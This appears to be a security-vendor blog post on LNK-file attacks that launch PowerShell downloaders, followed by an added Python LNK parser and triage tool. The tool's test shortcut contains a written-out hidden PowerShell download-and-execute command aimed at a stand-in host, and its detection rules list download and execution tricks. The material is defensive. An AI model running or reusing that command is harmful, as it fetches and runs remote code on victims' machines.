Update as of May 30, 2017, 5:00 AM CDT: the date referencing Trojan downloaders that used a .zip to disguise a LNK file attachment has been corrected.

PowerShell is a versatile command-line and shell scripting language from Microsoft that can integrate and interact with a wide array of technologies. It runs discreetly in the background and can be used to obtain system information without dropping an executable file on disk. All told, it makes an attractive tool for threat actors. There were a few notable instances where cybercriminals abused PowerShell: in March 2016 with the PowerWare ransomware, and in a new Fareit malware variant in April 2016. Because this looked like an upward trend, security administrators became more familiar with how to prevent PowerShell scripts from doing any damage.

However, cybercriminals are staying ahead of the curve by using an alternative means of executing PowerShell scripts: Windows shortcut (LNK) files. Users usually encounter LNK files as shortcuts, in places like the Desktop and Start Menu. LNK was actually already used as an attack vector as early as 2013, and in early 2017 we noted how Trojan downloaders used a .zip to disguise a LNK file attachment that led to the Locky ransomware. Now we are seeing an increase in attacks that leverage malicious LNK files which use legitimate applications, like PowerShell, to download malware or other malicious files.

To illustrate how the use of LNK files is rising, note how one single LNK malware family (detected by Trend Micro as LNK_DLOADR.*) has had a significant jump in detections since January 2017. The steep rise shows how popular this method is becoming:

Figure 1. Detected LNK_DLOADR over a 4 month period

In October 2016 we saw attackers using the combination of LNK, PowerShell, and the BKDR_ChChes malware in targeted attacks against Japanese government agencies and academics. A .jpg extension was used to camouflage the malicious PowerShell file.

Figure 2. Attack used to compromise Japanese targets in October 2016

In January 2017 we spotted the group APT10 (also called MenuPass, POTASSIUM, Stone Panda, Red Apollo, and CVNX) using a similar attack for a widespread spear-phishing campaign. In this version, the LNK file executes CMD.exe, which in turn downloads a fake .jpg file hiding the malicious PowerShell script. The group has continued to evolve its cyberespionage activities, and in April 2017 it used a similar strategy to also download BKDR_ChChes, a backdoor commonly used in targeted attacks.

We identified one campaign, likely still ongoing, that uses a new and more complicated LNK strategy. These attackers chain several layers of built-in Windows command-line tools. They send a phishing email with lures that push the victim to "double click for content", typically a DOCX or RTF file with a malicious LNK embedded in it.
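The chain described above (a shortcut whose target runs CMD.exe, which starts PowerShell, which fetches a script disguised as a .jpg) leaves its fingerprints in the shortcut's own StringData fields, so an analyst can triage a suspicious LNK without ever double-clicking it. The Python below is an added example, not Trend Micro's code or any tool from this post: it parses the ShellLinkHeader and StringData section of the MS-SHLLINK format (skipping the IDList and LinkInfo blocks) and applies a small rule set to the target path, working directory and command-line arguments. The two shortcuts it checks are constructed by the script itself; the paths, the hostname example.invalid and the rule labels are my own assumptions, chosen to mirror the cmd.exe/PowerShell/fake-.jpg pattern in the text.

```python
"""Minimal MS-SHLLINK (.lnk) parser with triage rules for shortcuts that
launch cmd.exe / PowerShell downloaders.  Added example; not Trend Micro code."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
HEADER_FMT = "<I16sIIQQQIIIHHII"  # 76-byte ShellLinkHeader, 14 fields
# LinkFlags bits (MS-SHLLINK 2.1.1) and the ShowCommand value for "start minimised"
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE, SW_SHOWMINNOACTIVE = 0x01, 0x02, 0x80, 7
# StringData entries appear in this fixed order when their LinkFlags bit is set
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))


def build_lnk(relative_path, arguments="", working_dir=None, show_command=1):
    """Construct a minimal Unicode .lnk with only StringData (test input only)."""
    values = {"relative_path": relative_path, "working_dir": working_dir,
              "arguments": arguments}
    flags, body = IS_UNICODE, b""
    for bit, key in STRING_FIELDS:          # emit in spec order, set matching flag
        text = values.get(key)
        if text:
            flags |= bit
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    header = struct.pack(HEADER_FMT, LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body + b"\x00\x00\x00\x00"  # TerminalBlock closes ExtraData


def _read_string(data, off, unicode):
    """One StringData entry: uint16 CountCharacters then the (unterminated) chars."""
    count = struct.unpack_from("<H", data, off)[0]
    nbytes = count * 2 if unicode else count
    raw = data[off + 2:off + 2 + nbytes]
    if len(raw) != nbytes:
        raise ValueError("truncated StringData")
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return text, off + 2 + nbytes


def parse_lnk(data):
    """Return ShowCommand and the StringData fields; skips IDList and LinkInfo."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a Shell Link")
    hdr = struct.unpack_from(HEADER_FMT, data, 0)
    if hdr[0] != LNK_HEADER_SIZE or hdr[1] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, off = hdr[2], LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:                  # IDListSize (uint16) + ItemIDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (uint32) covers the block
        off += struct.unpack_from("<I", data, off)[0]
    if off > len(data):
        raise ValueError("IDList/LinkInfo runs past end of file")
    info = {"flags": flags, "show_command": hdr[9]}
    for bit, key in STRING_FIELDS:
        info[key] = None
        if flags & bit:
            info[key], off = _read_string(data, off, bool(flags & IS_UNICODE))
    return info


# Triage rules over target path + working dir + arguments. Labels are my own.
_RULES = [(label, re.compile(rx, re.I)) for label, rx in (
    ("launches cmd.exe", r"\bcmd(\.exe)?\b"),
    ("launches PowerShell", r"\bpowershell(\.exe)?\b"),
    ("hidden window", r"-w(indowstyle)?\s+hidden"),
    ("execution policy bypass", r"-e(xecutionpolicy|p)\s+bypass"),
    ("encoded command", r"-e(nc|ncodedcommand)\b"),
    ("downloads from the web",
     r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|bitsadmin|certutil"),
    ("in-memory execution", r"\bIEX\b|Invoke-Expression"),
    ("URL with image extension (camouflaged script)", r"https?://\S+\.(jpe?g|png|gif)\b"),
)]


def triage_lnk(data):
    """Parse one shortcut and return (info, findings); empty findings = no rule fired."""
    info = parse_lnk(data)
    haystack = " ".join(v for v in (info["relative_path"], info["working_dir"],
                                    info["arguments"]) if v)
    findings = [label for label, rx in _RULES if rx.search(haystack)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("starts minimised (SW_SHOWMINNOACTIVE)")
    return info, findings


# Constructed samples (not real malware; example.invalid is a reserved name).
BENIGN_LNK = build_lnk(r"..\..\Program Files\Contoso\Editor.exe", "--open report.docx")
SUSPECT_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    "/c powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/photo.jpg')\"",
    working_dir=r"%TEMP%", show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("suspect", SUSPECT_LNK)):
        info, findings = triage_lnk(blob)
        print(f"{label}: {info['relative_path']} {info['arguments'] or ''}")
        print("  findings:", findings or "none")
```

To run it against real attachments, replace the constructed blobs with `open(path, "rb").read()`; the parser tolerates the IDList and LinkInfo blocks that real shortcuts carry, but ignores ExtraData, so an argument string stashed only in an EnvironmentVariableDataBlock would not be seen. Treat the rule list as a starting point: the useful signal is a document-looking lure whose target is a shell or script host, not any single keyword.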